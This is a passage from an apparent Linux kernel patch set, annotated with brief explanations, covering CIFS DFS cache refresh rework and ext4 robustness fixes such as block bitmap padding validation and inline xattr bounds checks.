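unsigned long find_next_zero_bit(const unsigned long *addr,
				 unsigned long size, unsigned long offset);

Both scan [offset, size) and return 'size' when nothing is found, which is exactly what the corrected "== end" comparisons rely on.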
+diff --git a/fs/cifs/cifsfs.c b/fs/cifs/cifsfs.c
+index 8485d380cddf9..2b2dd769c3bc2 100644
+--- a/fs/cifs/cifsfs.c
++++ b/fs/cifs/cifsfs.c
+@@ -743,6 +743,7 @@ static void cifs_umount_begin(struct super_block *sb)
+ 	spin_unlock(&tcon->tc_lock);
+ 	spin_unlock(&cifs_tcp_ses_lock);
+ 
++	cifs_close_all_deferred_files(tcon);
+ 	/* cancel_brl_requests(tcon); */ /* BB mark all brl mids as exiting */
+ 	/* cancel_notify_requests(tcon); */
+ 	if (tcon->ses && tcon->ses->server) {
+@@ -758,6 +759,20 @@ static void cifs_umount_begin(struct super_block *sb)
+ 	return;
+ }
+ 
++static int cifs_freeze(struct super_block *sb)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct cifs_tcon *tcon;
++
++	if (cifs_sb == NULL)
++		return 0;
++
++	tcon = cifs_sb_master_tcon(cifs_sb);
++
++	cifs_close_all_deferred_files(tcon);
++	return 0;
++}
++
+ #ifdef CONFIG_CIFS_STATS2
+ static int cifs_show_stats(struct seq_file *s, struct dentry *root)
+ {
+@@ -796,6 +811,7 @@ static const struct super_operations cifs_super_ops = {
+ 	as opens */
+ 	.show_options = cifs_show_options,
+ 	.umount_begin   = cifs_umount_begin,
++	.freeze_fs      = cifs_freeze,
+ #ifdef CONFIG_CIFS_STATS2
+ 	.show_stats = cifs_show_stats,
+ #endif
+diff --git a/fs/cifs/cifsglob.h b/fs/cifs/cifsglob.h
+index ea216e9d0f944..e6d12a6563887 100644
+--- a/fs/cifs/cifsglob.h
++++ b/fs/cifs/cifsglob.h
+@@ -1244,8 +1244,8 @@ struct cifs_tcon {
+ 	struct cached_fids *cfids;
+ 	/* BB add field for back pointer to sb struct(s)? */
+ #ifdef CONFIG_CIFS_DFS_UPCALL
+-	struct list_head ulist; /* cache update list */
+ 	struct list_head dfs_ses_list;
++	struct delayed_work dfs_cache_work;
+ #endif
+ 	struct delayed_work	query_interfaces; /* query interfaces workqueue job */
+ };
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index 87527512c2660..33fa18280e922 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -2386,6 +2386,9 @@ cifs_put_tcon(struct cifs_tcon *tcon)
+ 
+ 	/* cancel polling of interfaces */
+ 	cancel_delayed_work_sync(&tcon->query_interfaces);
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	cancel_delayed_work_sync(&tcon->dfs_cache_work);
++#endif
+ 
+ 	if (tcon->use_witness) {
+ 		int rc;
+@@ -2633,7 +2636,9 @@ cifs_get_tcon(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+ 		queue_delayed_work(cifsiod_wq, &tcon->query_interfaces,
+ 				   (SMB_INTERFACE_POLL_INTERVAL * HZ));
+ 	}
+-
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	INIT_DELAYED_WORK(&tcon->dfs_cache_work, dfs_cache_refresh);
++#endif
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_add(&tcon->tcon_list, &ses->tcon_list);
+ 	spin_unlock(&cifs_tcp_ses_lock);
+@@ -2749,6 +2754,13 @@ cifs_match_super(struct super_block *sb, void *data)
+ 
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	cifs_sb = CIFS_SB(sb);
++
++	/* We do not want to use a superblock that has been shutdown */
++	if (CIFS_MOUNT_SHUTDOWN & cifs_sb->mnt_cifs_flags) {
++		spin_unlock(&cifs_tcp_ses_lock);
++		return 0;
++	}
++
+ 	tlink = cifs_get_tlink(cifs_sb_master_tlink(cifs_sb));
+ 	if (tlink == NULL) {
+ 		/* can not match superblock if tlink were ever null */
+@@ -4119,9 +4131,13 @@ int cifs_tree_connect(const unsigned int xid, struct cifs_tcon *tcon, const stru
+ 
+ 	/* only send once per connect */
+ 	spin_lock(&tcon->tc_lock);
+-	if (tcon->ses->ses_status != SES_GOOD ||
+-	    (tcon->status != TID_NEW &&
+-	    tcon->status != TID_NEED_TCON)) {
++	if (tcon->status != TID_NEW &&
++	    tcon->status != TID_NEED_TCON) {
++		spin_unlock(&tcon->tc_lock);
++		return -EHOSTDOWN;
++	}
++
++	if (tcon->status == TID_GOOD) {
+ 		spin_unlock(&tcon->tc_lock);
+ 		return 0;
+ 	}
+diff --git a/fs/cifs/dfs.c b/fs/cifs/dfs.c
+index 4c392bde24066..a93dbca1411b2 100644
+--- a/fs/cifs/dfs.c
++++ b/fs/cifs/dfs.c
+@@ -157,6 +157,8 @@ static int get_dfs_conn(struct cifs_mount_ctx *mnt_ctx, const char *ref_path, co
+ 		rc = cifs_is_path_remote(mnt_ctx);
+ 	}
+ 
++	dfs_cache_noreq_update_tgthint(ref_path + 1, tit);
++
+ 	if (rc == -EREMOTE && is_refsrv) {
+ 		rc2 = add_root_smb_session(mnt_ctx);
+ 		if (rc2)
+@@ -259,6 +261,8 @@ static int __dfs_mount_share(struct cifs_mount_ctx *mnt_ctx)
+ 		if (list_empty(&tcon->dfs_ses_list)) {
+ 			list_replace_init(&mnt_ctx->dfs_ses_list,
+ 					  &tcon->dfs_ses_list);
++			queue_delayed_work(dfscache_wq, &tcon->dfs_cache_work,
++					   dfs_cache_get_ttl() * HZ);
+ 		} else {
+ 			dfs_put_root_smb_sessions(&mnt_ctx->dfs_ses_list);
+ 		}
+@@ -571,9 +575,13 @@ int cifs_tree_connect(const unsigned int xid, struct cifs_tcon *tcon, const stru
+ 
+ 	/* only send once per connect */
+ 	spin_lock(&tcon->tc_lock);
+-	if (tcon->ses->ses_status != SES_GOOD ||
+-	    (tcon->status != TID_NEW &&
+-	    tcon->status != TID_NEED_TCON)) {
++	if (tcon->status != TID_NEW &&
++	    tcon->status != TID_NEED_TCON) {
++		spin_unlock(&tcon->tc_lock);
++		return -EHOSTDOWN;
++	}
++
++	if (tcon->status == TID_GOOD) {
+ 		spin_unlock(&tcon->tc_lock);
+ 		return 0;
+ 	}
+diff --git a/fs/cifs/dfs_cache.c b/fs/cifs/dfs_cache.c
+index 9ccaa0c7ac943..1513b2709889b 100644
+--- a/fs/cifs/dfs_cache.c
++++ b/fs/cifs/dfs_cache.c
+@@ -20,12 +20,14 @@
+ #include "cifs_unicode.h"
+ #include "smb2glob.h"
+ #include "dns_resolve.h"
++#include "dfs.h"
+ 
+ #include "dfs_cache.h"
+ 
+-#define CACHE_HTABLE_SIZE 32
+-#define CACHE_MAX_ENTRIES 64
+-#define CACHE_MIN_TTL 120 /* 2 minutes */
++#define CACHE_HTABLE_SIZE	32
++#define CACHE_MAX_ENTRIES	64
++#define CACHE_MIN_TTL		120 /* 2 minutes */
++#define CACHE_DEFAULT_TTL	300 /* 5 minutes */
+ 
+ #define IS_DFS_INTERLINK(v) (((v) & DFSREF_REFERRAL_SERVER) && !((v) & DFSREF_STORAGE_SERVER))
+ 
+@@ -50,10 +52,9 @@ struct cache_entry {
+ };
+ 
+ static struct kmem_cache *cache_slab __read_mostly;
+-static struct workqueue_struct *dfscache_wq __read_mostly;
++struct workqueue_struct *dfscache_wq;
+ 
+-static int cache_ttl;
+-static DEFINE_SPINLOCK(cache_ttl_lock);
++atomic_t dfs_cache_ttl;
+ 
+ static struct nls_table *cache_cp;
+ 
+@@ -65,10 +66,6 @@ static atomic_t cache_count;
+ static struct hlist_head cache_htable[CACHE_HTABLE_SIZE];
+ static DECLARE_RWSEM(htable_rw_lock);
+ 
+-static void refresh_cache_worker(struct work_struct *work);
+-
+-static DECLARE_DELAYED_WORK(refresh_task, refresh_cache_worker);
+-
+ /**
+  * dfs_cache_canonical_path - get a canonical DFS path
+  *
+@@ -290,7 +287,9 @@ int dfs_cache_init(void)
+ 	int rc;
+ 	int i;
+ 
+-	dfscache_wq = alloc_workqueue("cifs-dfscache", WQ_FREEZABLE | WQ_UNBOUND, 1);
++	dfscache_wq = alloc_workqueue("cifs-dfscache",
++				      WQ_UNBOUND|WQ_FREEZABLE|WQ_MEM_RECLAIM,
++				      0);
+ 	if (!dfscache_wq)
+ 		return -ENOMEM;
+ 
+@@ -306,6 +305,7 @@ int dfs_cache_init(void)
+ 		INIT_HLIST_HEAD(&cache_htable[i]);
+ 
+ 	atomic_set(&cache_count, 0);
++	atomic_set(&dfs_cache_ttl, CACHE_DEFAULT_TTL);
+ 	cache_cp = load_nls("utf8");
+ 	if (!cache_cp)
+ 		cache_cp = load_nls_default();
+@@ -480,6 +480,7 @@ static struct cache_entry *add_cache_entry_locked(struct dfs_info3_param *refs,
+ 	int rc;
+ 	struct cache_entry *ce;
+ 	unsigned int hash;
++	int ttl;
+ 
+ 	WARN_ON(!rwsem_is_locked(&htable_rw_lock));
+ 
+@@ -496,15 +497,8 @@ static struct cache_entry *add_cache_entry_locked(struct dfs_info3_param *refs,
+ 	if (IS_ERR(ce))
+ 		return ce;
+ 
+-	spin_lock(&cache_ttl_lock);
+-	if (!cache_ttl) {
+-		cache_ttl = ce->ttl;
+-		queue_delayed_work(dfscache_wq, &refresh_task, cache_ttl * HZ);
+-	} else {
+-		cache_ttl = min_t(int, cache_ttl, ce->ttl);
+-		mod_delayed_work(dfscache_wq, &refresh_task, cache_ttl * HZ);
+-	}
+-	spin_unlock(&cache_ttl_lock);
++	ttl = min_t(int, atomic_read(&dfs_cache_ttl), ce->ttl);
++	atomic_set(&dfs_cache_ttl, ttl);
+ 
+ 	hlist_add_head(&ce->hlist, &cache_htable[hash]);
+ 	dump_ce(ce);
+@@ -616,7 +610,6 @@ static struct cache_entry *lookup_cache_entry(const char *path)
+  */
+ void dfs_cache_destroy(void)
+ {
+-	cancel_delayed_work_sync(&refresh_task);
+ 	unload_nls(cache_cp);
+ 	flush_cache_ents();
+ 	kmem_cache_destroy(cache_slab);
+@@ -1142,6 +1135,7 @@ static bool target_share_equal(struct TCP_Server_Info *server, const char *s1, c
+  * target shares in @refs.
+  */
+ static void mark_for_reconnect_if_needed(struct TCP_Server_Info *server,
++					 const char *path,
+ 					 struct dfs_cache_tgt_list *old_tl,
+ 					 struct dfs_cache_tgt_list *new_tl)
+ {
+@@ -1153,8 +1147,10 @@ static void mark_for_reconnect_if_needed(struct TCP_Server_Info *server,
+ 		     nit = dfs_cache_get_next_tgt(new_tl, nit)) {
+ 			if (target_share_equal(server,
+ 					       dfs_cache_get_tgt_name(oit),
+-					       dfs_cache_get_tgt_name(nit)))
++					       dfs_cache_get_tgt_name(nit))) {
++				dfs_cache_noreq_update_tgthint(path, nit);
+ 				return;
++			}
+ 		}
+ 	}
+ 
+@@ -1162,13 +1158,28 @@ static void mark_for_reconnect_if_needed(struct TCP_Server_Info *server,
+ 	cifs_signal_cifsd_for_reconnect(server, true);
+ }
+ 
++static bool is_ses_good(struct cifs_ses *ses)
++{
++	struct TCP_Server_Info *server = ses->server;
++	struct cifs_tcon *tcon = ses->tcon_ipc;
++	bool ret;
++
++	spin_lock(&ses->ses_lock);
++	spin_lock(&ses->chan_lock);
++	ret = !cifs_chan_needs_reconnect(ses, server) &&
++		ses->ses_status == SES_GOOD &&
++		!tcon->need_reconnect;
++	spin_unlock(&ses->chan_lock);
++	spin_unlock(&ses->ses_lock);
++	return ret;
++}
++
+ /* Refresh dfs referral of tcon and mark it for reconnect if needed */
+-static int __refresh_tcon(const char *path, struct cifs_tcon *tcon, bool force_refresh)
++static int __refresh_tcon(const char *path, struct cifs_ses *ses, bool force_refresh)
+ {
+ 	struct dfs_cache_tgt_list old_tl = DFS_CACHE_TGT_LIST_INIT(old_tl);
+ 	struct dfs_cache_tgt_list new_tl = DFS_CACHE_TGT_LIST_INIT(new_tl);
+-	struct cifs_ses *ses = CIFS_DFS_ROOT_SES(tcon->ses);
+-	struct cifs_tcon *ipc = ses->tcon_ipc;
++	struct TCP_Server_Info *server = ses->server;
+ 	bool needs_refresh = false;
+ 	struct cache_entry *ce;
+ 	unsigned int xid;
+@@ -1190,20 +1201,19 @@ static int __refresh_tcon(const char *path, struct cifs_tcon *tcon, bool force_r
+ 		goto out;
+ 	}
+ 
+-	spin_lock(&ipc->tc_lock);
+-	if (ses->ses_status != SES_GOOD || ipc->status != TID_GOOD) {
+-		spin_unlock(&ipc->tc_lock);
+-		cifs_dbg(FYI, "%s: skip cache refresh due to disconnected ipc\n", __func__);
++	ses = CIFS_DFS_ROOT_SES(ses);
++	if (!is_ses_good(ses)) {
++		cifs_dbg(FYI, "%s: skip cache refresh due to disconnected ipc\n",
++			 __func__);
+ 		goto out;
+ 	}
+-	spin_unlock(&ipc->tc_lock);
+ 
+ 	ce = cache_refresh_path(xid, ses, path, true);
+ 	if (!IS_ERR(ce)) {
+ 		rc = get_targets(ce, &new_tl);
+ 		up_read(&htable_rw_lock);
+ 		cifs_dbg(FYI, "%s: get_targets: %d\n", __func__, rc);
+-		mark_for_reconnect_if_needed(tcon->ses->server, &old_tl, &new_tl);
++		mark_for_reconnect_if_needed(server, path, &old_tl, &new_tl);
+ 	}
+ 
+ out:
+@@ -1216,10 +1226,11 @@ out:
+ static int refresh_tcon(struct cifs_tcon *tcon, bool force_refresh)
+ {
+ 	struct TCP_Server_Info *server = tcon->ses->server;
++	struct cifs_ses *ses = tcon->ses;
+ 
+ 	mutex_lock(&server->refpath_lock);
+ 	if (server->leaf_fullpath)
+-		__refresh_tcon(server->leaf_fullpath + 1, tcon, force_refresh);
++		__refresh_tcon(server->leaf_fullpath + 1, ses, force_refresh);
+ 	mutex_unlock(&server->refpath_lock);
+ 	return 0;
+ }
+@@ -1263,60 +1274,32 @@ int dfs_cache_remount_fs(struct cifs_sb_info *cifs_sb)
+ 	return refresh_tcon(tcon, true);
+ }
+ 
+-/*
+- * Worker that will refresh DFS cache from all active mounts based on lowest TTL value
+- * from a DFS referral.
+- */
+-static void refresh_cache_worker(struct work_struct *work)
++/* Refresh all DFS referrals related to DFS tcon */
++void dfs_cache_refresh(struct work_struct *work)
+ {
+ 	struct TCP_Server_Info *server;
+-	struct cifs_tcon *tcon, *ntcon;
+-	struct list_head tcons;
++	struct dfs_root_ses *rses;
++	struct cifs_tcon *tcon;
+ 	struct cifs_ses *ses;
+ 
+-	INIT_LIST_HEAD(&tcons);
++	tcon = container_of(work, struct cifs_tcon, dfs_cache_work.work);
++	ses = tcon->ses;
++	server = ses->server;
+ 
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
+-		spin_lock(&server->srv_lock);
+-		if (!server->leaf_fullpath) {
+-			spin_unlock(&server->srv_lock);
+-			continue;
+-		}
+-		spin_unlock(&server->srv_lock);
+-
+-		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
+-			if (ses->tcon_ipc) {
+-				ses->ses_count++;
+-				list_add_tail(&ses->tcon_ipc->ulist, &tcons);
+-			}
+-			list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-				if (!tcon->ipc) {
+-					tcon->tc_count++;
+-					list_add_tail(&tcon->ulist, &tcons);
+-				}
+-			}
+-		}
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	list_for_each_entry_safe(tcon, ntcon, &tcons, ulist) {
+-		struct TCP_Server_Info *server = tcon->ses->server;
+-
+-		list_del_init(&tcon->ulist);
++	mutex_lock(&server->refpath_lock);
++	if (server->leaf_fullpath)
++		__refresh_tcon(server->leaf_fullpath + 1, ses, false);
++	mutex_unlock(&server->refpath_lock);
+ 
++	list_for_each_entry(rses, &tcon->dfs_ses_list, list) {
++		ses = rses->ses;
++		server = ses->server;
+ 		mutex_lock(&server->refpath_lock);
+ 		if (server->leaf_fullpath)
+-			__refresh_tcon(server->leaf_fullpath + 1, tcon, false);
++			__refresh_tcon(server->leaf_fullpath + 1, ses, false);
+ 		mutex_unlock(&server->refpath_lock);
+-
+-		if (tcon->ipc)
+-			cifs_put_smb_ses(tcon->ses);
+-		else
+-			cifs_put_tcon(tcon);
+ 	}
+ 
+-	spin_lock(&cache_ttl_lock);
+-	queue_delayed_work(dfscache_wq, &refresh_task, cache_ttl * HZ);
+-	spin_unlock(&cache_ttl_lock);
++	queue_delayed_work(dfscache_wq, &tcon->dfs_cache_work,
++			   atomic_read(&dfs_cache_ttl) * HZ);
+ }
+diff --git a/fs/cifs/dfs_cache.h b/fs/cifs/dfs_cache.h
+index e0d39393035a9..c6d89cd6d4fd7 100644
+--- a/fs/cifs/dfs_cache.h
++++ b/fs/cifs/dfs_cache.h
+@@ -13,6 +13,9 @@
+ #include <linux/uuid.h>
+ #include "cifsglob.h"
+ 
++extern struct workqueue_struct *dfscache_wq;
++extern atomic_t dfs_cache_ttl;
++
+ #define DFS_CACHE_TGT_LIST_INIT(var) { .tl_numtgts = 0, .tl_list = LIST_HEAD_INIT((var).tl_list), }
+ 
+ struct dfs_cache_tgt_list {
+@@ -42,6 +45,7 @@ int dfs_cache_get_tgt_share(char *path, const struct dfs_cache_tgt_iterator *it,
+ 			    char **prefix);
+ char *dfs_cache_canonical_path(const char *path, const struct nls_table *cp, int remap);
+ int dfs_cache_remount_fs(struct cifs_sb_info *cifs_sb);
++void dfs_cache_refresh(struct work_struct *work);
+ 
+ static inline struct dfs_cache_tgt_iterator *
+ dfs_cache_get_next_tgt(struct dfs_cache_tgt_list *tl,
+@@ -89,4 +93,9 @@ dfs_cache_get_nr_tgts(const struct dfs_cache_tgt_list *tl)
+ 	return tl ? tl->tl_numtgts : 0;
+ }
+ 
++static inline int dfs_cache_get_ttl(void)
++{
++	return atomic_read(&dfs_cache_ttl);
++}
++
+ #endif /* _CIFS_DFS_CACHE_H */
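The dfs_cache rework replaces the single global refresh worker with a per-tcon delayed work: each DFS tcon re-queues its own dfs_cache_work after a pass, and the period is the smallest TTL seen in any cached referral, tracked in the dfs_cache_ttl atomic. The scheduling core reduces to these two fragments (taken from the hunks above):

	/* When a referral is cached, shrink the shared refresh period. */
	ttl = min_t(int, atomic_read(&dfs_cache_ttl), ce->ttl);
	atomic_set(&dfs_cache_ttl, ttl);

	/* At the end of each refresh pass, the work re-arms itself. */
	queue_delayed_work(dfscache_wq, &tcon->dfs_cache_work,
			   atomic_read(&dfs_cache_ttl) * HZ);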
+diff --git a/fs/cifs/file.c b/fs/cifs/file.c
+index bef7c335ccc6e..d037366fcc5ee 100644
+--- a/fs/cifs/file.c
++++ b/fs/cifs/file.c
+@@ -48,13 +48,13 @@ cifs_mark_open_files_invalid(struct cifs_tcon *tcon)
+ 	struct list_head *tmp1;
+ 
+ 	/* only send once per connect */
+-	spin_lock(&tcon->ses->ses_lock);
+-	if ((tcon->ses->ses_status != SES_GOOD) || (tcon->status != TID_NEED_RECON)) {
+-		spin_unlock(&tcon->ses->ses_lock);
++	spin_lock(&tcon->tc_lock);
++	if (tcon->status != TID_NEED_RECON) {
++		spin_unlock(&tcon->tc_lock);
+ 		return;
+ 	}
+ 	tcon->status = TID_IN_FILES_INVALIDATE;
+-	spin_unlock(&tcon->ses->ses_lock);
++	spin_unlock(&tcon->tc_lock);
+ 
+ 	/* list all files open on tree connection and mark them invalid */
+ 	spin_lock(&tcon->open_file_lock);
+diff --git a/fs/cifs/smb2ops.c b/fs/cifs/smb2ops.c
+index 502b6915ccc41..d6d6d04fbcbe2 100644
+--- a/fs/cifs/smb2ops.c
++++ b/fs/cifs/smb2ops.c
+@@ -1682,7 +1682,7 @@ smb2_copychunk_range(const unsigned int xid,
+ 		pcchunk->SourceOffset = cpu_to_le64(src_off);
+ 		pcchunk->TargetOffset = cpu_to_le64(dest_off);
+ 		pcchunk->Length =
+-			cpu_to_le32(min_t(u32, len, tcon->max_bytes_chunk));
++			cpu_to_le32(min_t(u64, len, tcon->max_bytes_chunk));
+ 
+ 		/* Request server copy to target from src identified by key */
+ 		kfree(retbuf);
+diff --git a/fs/ext4/balloc.c b/fs/ext4/balloc.c
+index 8ff4b9192a9f5..f2c415f31b755 100644
+--- a/fs/ext4/balloc.c
++++ b/fs/ext4/balloc.c
+@@ -303,6 +303,22 @@ struct ext4_group_desc * ext4_get_group_desc(struct super_block *sb,
+ 	return desc;
+ }
+ 
++static ext4_fsblk_t ext4_valid_block_bitmap_padding(struct super_block *sb,
++						    ext4_group_t block_group,
++						    struct buffer_head *bh)
++{
++	ext4_grpblk_t next_zero_bit;
++	unsigned long bitmap_size = sb->s_blocksize * 8;
++	unsigned int offset = num_clusters_in_group(sb, block_group);
++
++	if (bitmap_size <= offset)
++		return 0;
++
++	next_zero_bit = ext4_find_next_zero_bit(bh->b_data, bitmap_size, offset);
++
++	return (next_zero_bit < bitmap_size ? next_zero_bit : 0);
++}
++
+ /*
+  * Return the block number which was discovered to be invalid, or 0 if
+  * the block bitmap is valid.
+@@ -401,6 +417,15 @@ static int ext4_validate_block_bitmap(struct super_block *sb,
+ 					EXT4_GROUP_INFO_BBITMAP_CORRUPT);
+ 		return -EFSCORRUPTED;
+ 	}
++	blk = ext4_valid_block_bitmap_padding(sb, block_group, bh);
++	if (unlikely(blk != 0)) {
++		ext4_unlock_group(sb, block_group);
++		ext4_error(sb, "bg %u: block %llu: padding at end of block bitmap is not set",
++			   block_group, blk);
++		ext4_mark_group_bitmap_corrupted(sb, block_group,
++						 EXT4_GROUP_INFO_BBITMAP_CORRUPT);
++		return -EFSCORRUPTED;
++	}
+ 	set_buffer_verified(bh);
+ verified:
+ 	ext4_unlock_group(sb, block_group);
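The new ext4 padding check encodes an mkfs invariant: a block bitmap spans sb->s_blocksize * 8 bits, and every bit past the group's last cluster must be set (marked in use), so a search for a zero bit starting at that boundary must run off the end of the bitmap. A toy userspace model of the predicate (hypothetical sizes, plain byte-array bitmap):

#include <stdbool.h>

/* true iff all bits in [nr_clusters, bitmap_bits) are set */
static bool padding_ok(const unsigned char *bitmap,
		       unsigned int bitmap_bits, unsigned int nr_clusters)
{
	unsigned int bit;

	for (bit = nr_clusters; bit < bitmap_bits; bit++)
		if (!(bitmap[bit / 8] & (1u << (bit % 8))))
			return false;	/* clear padding bit => corruption */
	return true;
}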
+diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
+index 6479146140d20..a3f0c79568a64 100644
+--- a/fs/ext4/ext4.h
++++ b/fs/ext4/ext4.h
+@@ -1774,6 +1774,30 @@ static inline struct ext4_inode_info *EXT4_I(struct inode *inode)
+ 	return container_of(inode, struct ext4_inode_info, vfs_inode);
+ }
+ 
++static inline int ext4_writepages_down_read(struct super_block *sb)
++{
++	percpu_down_read(&EXT4_SB(sb)->s_writepages_rwsem);
++	return memalloc_nofs_save();
++}
++
++static inline void ext4_writepages_up_read(struct super_block *sb, int ctx)
++{
++	memalloc_nofs_restore(ctx);
++	percpu_up_read(&EXT4_SB(sb)->s_writepages_rwsem);
++}
++
++static inline int ext4_writepages_down_write(struct super_block *sb)
++{
++	percpu_down_write(&EXT4_SB(sb)->s_writepages_rwsem);
++	return memalloc_nofs_save();
++}
++
++static inline void ext4_writepages_up_write(struct super_block *sb, int ctx)
++{
++	memalloc_nofs_restore(ctx);
++	percpu_up_write(&EXT4_SB(sb)->s_writepages_rwsem);
++}
++
+ static inline int ext4_valid_inum(struct super_block *sb, unsigned long ino)
+ {
+ 	return ino == EXT4_ROOT_INO ||
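The four new ext4 helpers bundle two things that must always travel together during writeback: taking s_writepages_rwsem and entering a memalloc_nofs scope, so that allocations made while the semaphore is held cannot recurse into the filesystem and deadlock. Every converted call site collapses to a save/restore pair:

	int alloc_ctx;

	alloc_ctx = ext4_writepages_down_read(sb);
	ret = ext4_do_writepages(&mpd);	/* allocations here behave as GFP_NOFS */
	ext4_writepages_up_read(sb, alloc_ctx);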
+diff --git a/fs/ext4/extents_status.c b/fs/ext4/extents_status.c
+index 7bc221038c6c1..595abb9e7d74b 100644
+--- a/fs/ext4/extents_status.c
++++ b/fs/ext4/extents_status.c
+@@ -267,14 +267,12 @@ static void __es_find_extent_range(struct inode *inode,
+ 
+ 	/* see if the extent has been cached */
+ 	es->es_lblk = es->es_len = es->es_pblk = 0;
+-	if (tree->cache_es) {
+-		es1 = tree->cache_es;
+-		if (in_range(lblk, es1->es_lblk, es1->es_len)) {
+-			es_debug("%u cached by [%u/%u) %llu %x\n",
+-				 lblk, es1->es_lblk, es1->es_len,
+-				 ext4_es_pblock(es1), ext4_es_status(es1));
+-			goto out;
+-		}
++	es1 = READ_ONCE(tree->cache_es);
++	if (es1 && in_range(lblk, es1->es_lblk, es1->es_len)) {
++		es_debug("%u cached by [%u/%u) %llu %x\n",
++			 lblk, es1->es_lblk, es1->es_len,
++			 ext4_es_pblock(es1), ext4_es_status(es1));
++		goto out;
+ 	}
+ 
+ 	es1 = __es_tree_search(&tree->root, lblk);
+@@ -293,7 +291,7 @@ out:
+ 	}
+ 
+ 	if (es1 && matching_fn(es1)) {
+-		tree->cache_es = es1;
++		WRITE_ONCE(tree->cache_es, es1);
+ 		es->es_lblk = es1->es_lblk;
+ 		es->es_len = es1->es_len;
+ 		es->es_pblk = es1->es_pblk;
+@@ -931,14 +929,12 @@ int ext4_es_lookup_extent(struct inode *inode, ext4_lblk_t lblk,
+ 
+ 	/* find extent in cache firstly */
+ 	es->es_lblk = es->es_len = es->es_pblk = 0;
+-	if (tree->cache_es) {
+-		es1 = tree->cache_es;
+-		if (in_range(lblk, es1->es_lblk, es1->es_len)) {
+-			es_debug("%u cached by [%u/%u)\n",
+-				 lblk, es1->es_lblk, es1->es_len);
+-			found = 1;
+-			goto out;
+-		}
++	es1 = READ_ONCE(tree->cache_es);
++	if (es1 && in_range(lblk, es1->es_lblk, es1->es_len)) {
++		es_debug("%u cached by [%u/%u)\n",
++			 lblk, es1->es_lblk, es1->es_len);
++		found = 1;
++		goto out;
+ 	}
+ 
+ 	node = tree->root.rb_node;
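The extents_status change acknowledges that the tree->cache_es hint can be updated concurrently: the reader now takes a single READ_ONCE() snapshot of the pointer and validates only that snapshot (so the compiler cannot reload it mid-check), while the writer publishes the new hint with a single WRITE_ONCE() store. The pattern in isolation:

	struct extent_status *es1;

	/* Reader: one snapshot, then use only the snapshot. */
	es1 = READ_ONCE(tree->cache_es);
	if (es1 && in_range(lblk, es1->es_lblk, es1->es_len))
		goto out;	/* cache hit */

	/* Writer: publish the new hint in one store. */
	WRITE_ONCE(tree->cache_es, es1);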
+diff --git a/fs/ext4/hash.c b/fs/ext4/hash.c
+index 147b5241dd94f..46c3423ddfa17 100644
+--- a/fs/ext4/hash.c
++++ b/fs/ext4/hash.c
+@@ -277,7 +277,11 @@ static int __ext4fs_dirhash(const struct inode *dir, const char *name, int len,
+ 	}
+ 	default:
+ 		hinfo->hash = 0;
+-		return -1;
++		hinfo->minor_hash = 0;
++		ext4_warning(dir->i_sb,
++			     "invalid/unsupported hash tree version %u",
++			     hinfo->hash_version);
++		return -EINVAL;
+ 	}
+ 	hash = hash & ~1;
+ 	if (hash == (EXT4_HTREE_EOF_32BIT << 1))
+diff --git a/fs/ext4/inline.c b/fs/ext4/inline.c
+index 1602d74b5eeb3..cb36037f20fc8 100644
+--- a/fs/ext4/inline.c
++++ b/fs/ext4/inline.c
+@@ -34,6 +34,7 @@ static int get_max_inline_xattr_value_size(struct inode *inode,
+ 	struct ext4_xattr_ibody_header *header;
+ 	struct ext4_xattr_entry *entry;
+ 	struct ext4_inode *raw_inode;
++	void *end;
+ 	int free, min_offs;
+ 
+ 	if (!EXT4_INODE_HAS_XATTR_SPACE(inode))
+@@ -57,14 +58,23 @@ static int get_max_inline_xattr_value_size(struct inode *inode,
+ 	raw_inode = ext4_raw_inode(iloc);
+ 	header = IHDR(inode, raw_inode);
+ 	entry = IFIRST(header);
++	end = (void *)raw_inode + EXT4_SB(inode->i_sb)->s_inode_size;
+ 
+ 	/* Compute min_offs. */
+-	for (; !IS_LAST_ENTRY(entry); entry = EXT4_XATTR_NEXT(entry)) {
++	while (!IS_LAST_ENTRY(entry)) {
++		void *next = EXT4_XATTR_NEXT(entry);
++
++		if (next >= end) {
++			EXT4_ERROR_INODE(inode,
++					 "corrupt xattr in inline inode");
++			return 0;
++		}
+ 		if (!entry->e_value_inum && entry->e_value_size) {
+ 			size_t offs = le16_to_cpu(entry->e_value_offs);
+ 			if (offs < min_offs)
+ 				min_offs = offs;
+ 		}
++		entry = next;
+ 	}
+ 	free = min_offs -
+ 		((void *)entry - (void *)IFIRST(header)) - sizeof(__u32);
+@@ -350,7 +360,7 @@ static int ext4_update_inline_data(handle_t *handle, struct inode *inode,
+ 
+ 	error = ext4_xattr_ibody_get(inode, i.name_index, i.name,
+ 				     value, len);
+-	if (error == -ENODATA)
++	if (error < 0)
+ 		goto out;
+ 
+ 	BUFFER_TRACE(is.iloc.bh, "get_write_access");
+@@ -1177,6 +1187,7 @@ static int ext4_finish_convert_inline_dir(handle_t *handle,
+ 		ext4_initialize_dirent_tail(dir_block,
+ 					    inode->i_sb->s_blocksize);
+ 	set_buffer_uptodate(dir_block);
++	unlock_buffer(dir_block);
+ 	err = ext4_handle_dirty_dirblock(handle, inode, dir_block);
+ 	if (err)
+ 		return err;
+@@ -1251,6 +1262,7 @@ static int ext4_convert_inline_data_nolock(handle_t *handle,
+ 	if (!S_ISDIR(inode->i_mode)) {
+ 		memcpy(data_bh->b_data, buf, inline_size);
+ 		set_buffer_uptodate(data_bh);
++		unlock_buffer(data_bh);
+ 		error = ext4_handle_dirty_metadata(handle,
+ 						   inode, data_bh);
+ 	} else {
+@@ -1258,7 +1270,6 @@ static int ext4_convert_inline_data_nolock(handle_t *handle,
+ 						       buf, inline_size);
+ 	}
+ 
+-	unlock_buffer(data_bh);
+ out_restore:
+ 	if (error)
